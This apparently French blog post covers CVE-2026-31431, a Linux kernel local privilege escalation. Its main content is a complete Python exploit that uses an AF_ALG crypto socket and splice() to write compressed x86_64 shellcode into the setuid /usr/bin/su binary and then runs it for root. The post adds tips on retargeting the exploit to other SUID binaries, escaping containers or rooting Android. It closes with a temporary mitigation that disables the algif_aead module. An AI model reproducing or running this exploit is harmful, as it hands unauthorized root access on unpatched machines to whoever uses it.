Micron Document
╔═══════════════════════════════════════════════════════════╗
β•‘β–‘β–ˆβ–€β–€β–‘β–€β–ˆβ–€β–‘β–ˆβ–€β–ˆβ–‘β–€β–ˆβ–€β–‘β–€β–ˆβ–€β–‘β–ˆβ–€β–ˆβ–‘β–ˆβ–€β–ˆβ–‘β–‘β–‘β–ˆβ–‘β–‘β–‘β–ˆβ–‘β–ˆβ–‘β–ˆβ–€β–ˆβ–‘β–ˆβ–€β–ˆβ–‘β–€β–ˆβ–€β–‘β–ˆβ–€β–„β–‘β–ˆβ–€β–€β–‘β•‘
β•‘β–‘β–€β–€β–ˆβ–‘β–‘β–ˆβ–‘β–‘β–ˆβ–€β–ˆβ–‘β–‘β–ˆβ–‘β–‘β–‘β–ˆβ–‘β–‘β–ˆβ–‘β–ˆβ–‘β–ˆβ–‘β–ˆβ–‘β–‘β–‘β–ˆβ–‘β–‘β–‘β–ˆβ–‘β–ˆβ–‘β–ˆβ–‘β–ˆβ–‘β–ˆβ–€β–ˆβ–‘β–‘β–ˆβ–‘β–‘β–ˆβ–€β–„β–‘β–ˆβ–€β–€β–‘β•‘
β•‘β–‘β–€β–€β–€β–‘β–‘β–€β–‘β–‘β–€β–‘β–€β–‘β–‘β–€β–‘β–‘β–€β–€β–€β–‘β–€β–€β–€β–‘β–€β–‘β–€β–‘β–‘β–‘β–€β–€β–€β–‘β–€β–€β–€β–‘β–€β–‘β–€β–‘β–€β–‘β–€β–‘β–€β–€β–€β–‘β–€β–‘β–€β–‘β–€β–€β–€β–‘β•‘
β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•
Nous sommes le 30/07/2026 β€” Phase de la Lune: πŸŒ•
Liste des publications:
<

CVE-2026-31431 "COPY FAIL", LPE KERNEL LINUX.
publiΓ© le 01 mai 2026
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Une nouvelle (en 2026) vulnΓ©rabilitΓ© dans le kernel linux, permet Γ  unΒ·e attaquantΒ·e ayant la capacitΓ© d'Γ©xecuter du code, de passer root sur la plupart des kernels linux depuis 2017. PubliΓ©e sur le site https://copy.fail
Exploit
L'exploit tient en quelques lignes de python (python β‰₯ 3.10):
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
try:u.recv(8+t)
except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")

L'exploit repose sur le fait qu'un binaire existant soit suid, ici avec /usr/bin/su, qui n'est pas nΓ©cessairement disponnible sur toutes les distribution, par exemple dans un container docker ou bien sur android. En revanche il ne s'agit lΓ  que d'une restriction de l'exploit en tant que tel, mais la vulnΓ©rabilitΓ© rΓ©side en fait dans le fait de pouvoir Γ©crire directement dans la mΓ©moire du processus suid via splice().
On peut tout à fait imaginer que cette vulnérabilité soit utilisée pour échapper un containeur ou bien root un android, en modifiant légèrement l'exploit.
Si su n'existe pas, on peut changer le chemin du binaire pour un qui existerai sur le système en question, que vous pouvez trouver avec la commande $ find / -perm /4000.
Pour android, je ne suis pas encore trop certaine de comment procΓ©der, mais la vulnΓ©rabilitΓ© semble Γͺtre un vecteur suffisament puissant pour le permettre.
Γ€ noter Γ©galement que la partie de l'exploit dans le zlib.decompress() est en fait un shellcode qui doit Γͺtre compilΓ© pour la bonne architecture. Dans l'exploit, il s'agit d'un shellcode pour l'architecture x86_64, qui ne fonctionne pas sur ARM par exemple.
Patch
Pour corriger la vulnΓ©rabilitΓ©, il suffit de mettre Γ  jour le kernel linux, mais certains OS sont un peu en retard, notamment Debian et Ubuntu.
Il est possible de patcher TEMPORAIREMENT de la faΓ§on suivante:
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || true
Oubliez pas d'enlever ce correctif quand le kernel sera patché ! Désactiver ce module kernel risque d'impacter la performance de votre système lorsqu'il aura à effectuer des opérations de cryptographie.